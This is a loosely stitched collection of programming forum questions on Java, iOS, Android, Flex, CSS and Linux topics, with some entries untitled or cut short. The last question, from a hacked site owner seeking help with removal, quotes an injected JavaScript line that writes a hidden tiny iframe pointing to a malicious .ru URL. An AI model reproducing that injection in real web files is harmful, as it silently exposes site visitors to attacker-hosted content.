• Java Pack No Resize

  i am learning Java at the moment and have the following question: i am adding my controls to JFrame and then pack() before displaying. this runs the application and all is very nice. i was wondering is there a way to stop the user from resizing the application window? also is there a way to for the image in JLabel to expand as the user changes the application window? at the moment i have it as: constraints.fill = GridBagConstraints.BOTH; constraints.anchor = GridBagConstraints.CENTER; and it only centers the image, i would like to be able to expand/shrink the image. thanks.

• How do I package an SDK (static lib + xibs) for the iPhone?

  I am creating an SDK for a client that includes predefined view controllers. What is the recommended way to package everything (static lib, .xib(s), and .png(s)) for easy use? SDKs that I've used (e.g. Pinch Media) do a good job of just providing a .h and .a file that expose only user accessible functionality and hiding everything else. As I read Apple's documentation, a framework would be ideal but is not permitted on iPhoneOS. Some key requirements: Don't expose source or object internals. Be easy to use & set up. • Quickest and most efficient method to search top 3 numbers?

  I currently have an array of around 8 - 10 numbers that changes on a periodic basis. So around every 5 - 10 seconds the numbers get updated. I need to get the top 3 numbers in the array every 10 seconds. This is all done on a mobile device. At the minute I iterate through the array 3 times and each time I take out the three highest numbers and place them in three previously declared variables. My question is what should I look to do to increase speed and efficiency in this instance?

• How do you combine a Move and Rotate effect in Flex 3?

  I realize you can make one of each effect, set the same target, and hit .play();, but this produces weird results (acknowledged by Adobe, fixed in Flex 4). I'm trying to have an object move from the top of the screen to the bottom while it rotates around it's own center. When called independently, both of these effects work perfectly. When called together, the object always rotates around the top left corner. I even tried putting them both inside a <Parallel> tag with no success. Has anyone come up with a workaround?

• Need help on understanding Mobile First concept

  So, I worked on responsive sites before but I'm on my way to build my first responsive site now. I opened some articles on the subject, and boom: Mobile First.. I have no idea how I skipped that concept till now. From the beginning I cant seem to understand whole thing (except that number of mobile devices will take out soon desktop computers) and here is why. How I'm supposed to know how my site will look for desktop version, if I design it for mobile first? I mean, on the smallest device I will have to eventually hide some content etc, how I'm supposed to know what to hide and move things, when I don't know how the site will look on bigger screen? Isn't stripping the things easier?!?! For me (right now), the Mobile First concept looks to me like building pyramid upside down.

• port an iOS (iPhone) app to mac?

  Is there a preferred way to go about this? The app in question is not too large . . . single-player game that I wrote over the course of a couple of months. EDIT: I should add that I have no experience with mac development . . . outside of what comes naturally with being an iOS developer. EDIT: Classes heavily used in the game: subclasses of NSObject, UIView, and UIViewController. I don't know much about NSView, but I'm pretty sure all the UIView stuff will work in that class. Also some use of UITableViewController. I do also have Game Center, but I can leave that part out for now. There is no multi-touch.

• is there any way to get country names from iPhone APIs?

  Hi, I want to provide a picker to the user to select a country. I've had a look in the NSLocale docs and I can get a list of all of the country codes supported on the device, which feels like a start: Code: NSArray *codes = [[NSArray alloc] initWithArray:[NSLocale ISOCountryCodes]]; But I can't work out if there is a programatic way to convert this array into country names... Ideally this list would be localized as well, i.e. show the country name in the user's preferred language. Can anyone point me in the right direction?

• poll(2) doesn't empty the event queue

  Hi, Im using linux as my programming platform. I am using poll(2) to know if my device is triggering an event. The first call of poll is ok, it blocks and wait for the event to happen. But in the second poll function call, it will return but it capture the event. Below are my code ret = poll( fds, 1, 2000); //2 secs timeout if( fds[0].revents & POLLIN && ret > 0) { printf("event occur\n"); } It seems the queue/buffer is not empty, im just assuming. • Make a simulation using python

  I am new to programming and using python. What I am trying to do is create a simulation of a thermostat system by using python. Is there a way to create a program that I can input data, for example temperature and humidity values and then have python constantly plotting the data as I enter the values. This is to simulate a device gathering data and sending it to this program and having it being plotted. I have found ways to plot data by using matplotlib but I have not been able to find a way that I can input the data and have the plot upgrade constantly. Thanks any advise is appreciated.

• Picking photo from Photochooser or holding hardware back button cause active timers ring

  This is very strange problem, and all the people I had asked to confirm it said that it takes place. I have a Threading.Timer instance which fires every 15 minutes. And if I call the PhotoChooser view and then select a photo from it, when going back to the calling page my application calls that timer's callback! I tried different timers either it be Timer from Threading namespace or Dispatcher timer. The same happens when being in my app I hold the back button of my device and then choose the app from the list. My application is as plain as it can be - the timer with a callback and method calling PhotoChooser. Could anyone help with solution or workaround please?

  Okay so I've been typing some HTML code for a technology class that I need to satisfy for my Education major. This is what i have for my background: body { background-image:url('islandbeach.jpg'); background-repeat:repeat; background-position:center; background-attachment:fixed; background-size:cover; } Now, I want to make my background transparent or faded so I can see the text and the other image that I have. The background is too colorful to be able to see the words without having to squint. Are there any HTML codes that can do this for me? • Iterators over a LInked List in a Game in Java

  I am using OpenGl in android and they have a callback method called draw that gets called with out my control. (As fast as the device can handle if I am not mistaken) I have a list of "GameObjects" that have a .draw method and a .update method. I have two different threads that handle each of those. So, the question is, can I declare two different iterators in two different methods in two different threads that iterate over the same Linked List? If so, do I simply declare ListIterator<GameObject> l = objets.listIterator() each time I want a new iterator and it won't interfere with other iterators?

  I want to simply switch certain data pins on and off, so that they can control a set of relays. I'm not asking about the hardware bit (should be easy), but I don't know where to begin writing the software. I don't want a high level library that can send bytes to a device - I literally want to switch on/off certain pins. I'm running Linux and I want to do this in Java, so would I just need a library? It would be nice if the library has good documentation and is easy to use, but if not then a short example code will help me get started.

• How can I get my app ready for the iPhone 5

  Apple just announced the iPhone 5 with a 4 inch screen and a 16:9 aspect ratio. Of course, they only give developers two weeks to scramble to update their apps without being able to test. I'd like to update my app for the iPhone 5's new big screen, but there's nothing on Apple's developer site about the iPhone 5 or making your apps ready for a larger screen. It would be a pain to have to write my own logic for testing whether the device is an iPhone 5 and then displaying a custom storyboard file for it. Does anyone know how the new sizing works or if there are any hidden Xcode for this?

  I'm about to write my first Android app. It's a fairly basic app that doesn't use any special features beyond being able to schedule notifications and read/write image files to the device's local storage. Reaching the broadest audience is my top priority. If I target Android 1.5, is the app guaranteed to run fine all the way up to ICS? Should I target Android 2.1, which seems to be the new baseline for common phones in use? Since the app is fairly basic, if I target ICS, would it run on versions going all the way back to 2.1? Maybe this is a stupid question.

• Sidescrolling UI on iPhone

  Please lead me in the right direction. I need to provide user with small text centered on the iPhone screen. User can make quick scroll left or right in order to get the next or previous text. There can be hundreds of such text pieces. The process itself is similar to Photo application sidescrolling but much simple, no zoom. As far as I can understand I need to use UIScrollView class, then call hundreds of addSubviews? Is it the optimal way or I should always keep 3 subviews and replace them on the fly? I need to prevent the situation when several ObjectManager instances are dealing with the same order simultaneously (it happend once because of some errors on the remote payment processing center, somehow they called our callback urls twice). • Legal Issue: Remove/Hide links on Google Login page

  For the background: I'm developing a device application which offers connection to Google Drive. My end-users will need to login to their Google Account and authorize my application to access their Google Drive. I'm using OAuth 2.0 to do this. But my concern is that I don't want users to navigate away from my application using the links on the Google Login page. Basically, I don't want them to use my application to browse the internet. Question: Will I violate any terms of service/usage if I hide or change the href the links using GreaseMonkey or TamperMonkey? The changes will only be on the client side and I won't alter any processing at all. I already checked https://developers.google.com/terms/ but I found no item related to modifying the pages on client side. Thanks in advance.

• How can I achieve a complicated CSS layout?

  I have a page here. There is a contents panel, and a content panel. I would like to center the content, and push the contents panel to the top right corner. This behaviour already works. However, the layout does not work as I would like when the page is shrunk. Ideally, the content would be pushed to the right side of the screen, and a 5px gap maintained between the content and the contents. At present, however, the contents just overlaps the content, which isn't really what I want. Is such a layout possible, without resorting to javascript?

• Using sed to delete string

  I was hacked and have hundreds of .js files with this line of code that I'm trying to get rid of: ;document.write('<iframe src="http://sitecorporatemanagement.ru/pretzellogmeins.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); It is the last line of the file, but I think the file contains windows line endings, because when ever I do this: sed -i '/sitecorporatemanagement.ru/d' * it deletes the full content of the file. Can you help me get this to work? I just need that full string deleted. Thank you for all the help you can give.
